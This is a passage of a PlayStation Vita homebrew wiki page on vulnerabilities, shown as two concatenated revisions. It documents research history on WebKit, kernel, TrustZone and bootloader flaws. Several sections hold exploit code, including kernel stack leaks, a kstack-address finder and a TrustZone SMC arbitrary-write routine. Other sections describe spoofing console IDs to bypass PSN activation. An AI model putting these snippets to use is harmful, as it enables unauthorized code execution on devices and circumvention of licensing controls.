{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Games savedata exploits (h-encore) ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Bug implemented by TheFloW in h-encore.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow writeup]<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof Firmware version for bypassing FW Update popup and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHENkaku 3.60-3.68. This also means ReStore / ReNpDrm is not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Stack leak using sceIoDevctl from userland applications ===<br />
(tested successfully on firmware 0.995, fixed at least on firmware 1.030, works on later firmware via webkit)<br />
<pre><br />
// let's make a buffer, with 0x66's<br />
char outbuf[0x400];<br />
memset(outbuf, 0x066, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // sceIoOpen to populate kernel stack<br />
<br />
// and now, let's get the stack back and check if our data was actually written there..<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</pre><br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Confirmed exploitable before 1.80. Tested on 1.50 and 1.61.<br />
<br />
Patched on 1.80. They also added an IsShell check.<br />
<br />
=== sceIoDevctl does not clear stack buffer (henkaku kernel exploit) ===<br />
<br />
Discovered on 2014-11-24.<br />
<br />
Only works in webkit, not in fself nor game.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call devctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="c"><br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, WINDOW_BASE+0x10, 0x3FF);<br />
store(RET, WINDOW_BASE+0x4);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
(2015-07-03) A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
This was patched in 1.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05. Implemented in HENkaku. See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup]<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or just before.<br />
<br />
==== kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here]<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
=== SceNgs design flaws (h-encore kernel exploits) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore 3.65-3.68.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== kstack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack addr faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== memcpy bugs (h-encore kernel exploit) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. We can mod eMMC MBR to change block size. But yifan was trying to exploit it with an adjacent malloc(controlled_size) and couldn't find a way so just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx find the way to exploit the buffer overflow. He discovers a logic flaw related to error code propagation in NSBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
=== SMC 0x12F does not validate arguments -> TrustZone level arbitrary code execution ===<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
(2017-01-01) SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table).<br />
<br />
This results in TrustZone level arbitrary code execution.<br />
<br />
It was patched somewhere around after 1.80 before 2.10.<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [https://pastebin.com/59pe8jBg there].<br />
<br />
Example code exploiting this vulnerability:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== To be disclosed ===<br />
<br />
(2017-02-23) To be disclosed.<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=10561Vulnerabilities2019-02-02T21:51:21Z<p>Xyz: /* Hardware */</p>
<hr />
<div>== Userland ==<br />
<br />
=== Webkit exploits in Email app ===<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup]<br />
<br />
=== WebKit 531 (Vita FW BEFORE 2.00) ===<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
=== WebKit 536 (Vita FW 2.00 thru 3.20) (CVE-2012-3748) (2013-09-03-1) ===<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<ref>http://packetstormsecurity.com/files/123088/</ref><br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ===<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) ===<br />
<br />
Discovered by xyz. Fixed in 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit simplified code by St4rk]<br />
<br />
=== PSM Mono privilege escalation ===<br />
<br />
https://yifan.lu/2015/06/21/hacking-the-ps-vita/<br />
<br />
=== PSM Unity privilege escalation ===<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
=== PSM NetworkRequest privilege escalation ===<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Games savedata exploits (h-encore) ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Bug implemented by TheFloW in h-encore.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow writeup]<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof Firmware version for bypassing FW Update popup and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHENkaku 3.60-3.68. This also means ReStore / ReNpDrm is not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Stack leak using sceIoDevctl from userland applications ===<br />
(tested successfully on firmware 0.995, fixed at least on firmware 1.030, works on later firmware via webkit)<br />
<pre><br />
// let's make a buffer, with 0x66's<br />
char outbuf[0x400];<br />
memset(outbuf, 0x066, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // sceIoOpen to populate kernel stack<br />
<br />
// and now, let's get the stack back and check if our data was actually written there..<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</pre><br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Confirmed exploitable before 1.80. Tested on 1.50 and 1.61.<br />
<br />
Patched on 1.80. They also added an IsShell check.<br />
<br />
=== sceIoDevctl does not clear stack buffer (henkaku kernel exploit) ===<br />
<br />
Discovered on 2014-11-24.<br />
<br />
Only works in webkit, not in fself nor game.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call devctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="c"><br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, WINDOW_BASE+0x10, 0x3FF);<br />
store(RET, WINDOW_BASE+0x4);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
(2015-07-03) A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
This was patched in 1.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05. Implemented in HENkaku. See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup]<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or just before.<br />
<br />
==== kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here]<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
=== SceNgs design flaws (h-encore kernel exploits) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore 3.65-3.68.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== kstack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack addr faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
